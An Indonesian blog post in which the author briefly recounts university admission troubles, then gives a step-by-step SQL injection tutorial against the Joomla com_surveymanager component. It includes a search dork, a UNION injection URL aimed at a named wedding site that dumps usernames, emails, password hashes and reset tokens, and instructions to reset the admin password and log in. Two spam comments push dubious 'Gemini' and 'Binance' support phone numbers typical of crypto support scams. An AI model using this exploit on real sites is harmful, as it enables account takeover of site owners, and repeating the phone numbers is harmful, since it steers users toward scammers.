10.01
Technology
Hai sobat Blogger semua? Lama tidak posting lagi, semenjak kesibukan mempersiapkan UN, lalu disusul UAS, dan kemudian hal paling mendebarkan, yaitu SNMPTN. Penulis jadi tidak sempat meng-update. Tidak hanya sampai situ, dilanjut tes-tes lainnya sebagai cadangan kalau-kalau tidak tembus SNMPTN. Dengan berat hati, ternyata ‘tidak lulus’ SNMPTN saudara-saudara. Bingung. Belum ada satupun cadangan waktu itu. Sebenarnya sih ada, tapi sudah expired, yaitu diterima di Universitas Gunadarma, Universitas Bakrie, dan Universitas Komputer Indonesia. Semuanya di jurusan Informatika. Tapi apalah daya, nunggu SNMPTN sampe pada expired semua. Kenapa ga DP dulu? Dikira cicilan laptop? Hmm.. alasannya simpel, biaya. Oh, kenapa masalah klasik masih ada di Indonesia? Seandainya ga pada korupsi, pasti makmur. Tapi yaa, seandainya tetap seandainya. Lalu dimana saya sekarang?? Tenang, saya tetap masih bisa kuliah. Di IT Telkom Bandung. Tepatnya di jurusan Ilmu Komputasi. Kok jadi curhat ya? ^_^v Ok deh lanjut tutorialnya. Credit ke milw0rm.com
OK, pertama sediain dulu dork-nya : option=com_surveymanager
Terus cari targetnya. Anggap udah dapet http://www.yourwedding.com.au
Exploit-nya : -2+union+select+1,concat_ws(0x3a,username,password) ,3,4,5,6+from+jos_users—
Hmm.. disini pake teknik reset Joomla
Caranya :
untuk masuk halaman reset >>> index.php?option=com_user&view=reset
Jadinya http://www.yourwedding.com.au/index.php?option=com_user&view=reset
untuk mendapatkan email setelah concat (0x3a,username,0x3a,email,0x3a,password,0x3a,activation)
Jadinya http://www.yourwedding.com.au/index.php?option=com_surveymanager&task=editsurvey&stype=-2+union+select+1,concat_ws%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,3,4,5,6+from+jos_users--
untuk masuk halaman token >>> index.php?option=com_user&view=reset&layout=confirm
Jadinya http://www.yourwedding.com.au/index.php?option=com_user&view=reset&layout=confirm
untuk mendapatkan token setelah concat (0x3a,username,0x3a,email,0x3a,0x3a,activation)
Jadinya http://www.yourwedding.com.au/index.php?option=com_surveymanager&task=editsurvey&stype=-2+union+select+1,concat_ws%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,3,4,5,6+from+jos_users--
Udah di reset Joomla tinggal >>> http://www.yourwedding.com.au/administrator/
Masukin dah tuh user n password-nya yang tadi sudah di reset.
Oiya, untuk tambahan, cari target yang vurn pake exploit scanner ajah biar cepet.. :D kayak pepatah “Biar cepat yang penting selamat”.
2 komentar:
Gemini support is a fundamental prerequisite to wipe out your Gemini mistakes in a problem free and fast way. You need to deliver your issues to the experts who are prepared and talented in taking care of the Gemini mistakes and have the plenty of arrangements and cures in their kitty. You can connect with them by dialing Gemini Support number +1800-861-8259 talk or an email. They are dependably at your administration and carry on well-considerate with the clients
Gemini Support number
Gemini Support phone number
Gemini Support phone number
Gemini phone number
Gemini number
Gemini Customer Service number
The Binance is an easy to understand interface helps in associating with a product stage for advanced resources. On the off chance that you are not ready to sell bitcoin on Binance account. You can connect with adept experts over Binance Customer Service number+1877-209-3306 whenever to get quick and immaculate cures. The specialists will direct you the entire procedure in detail and exact way. You can get well suited answers for fix your glitches and blunders.
Binance Support number
Binance Support phone number
Binance Support phone number
Binance phone number
Binance number
Binance Customer Service number
Posting Komentar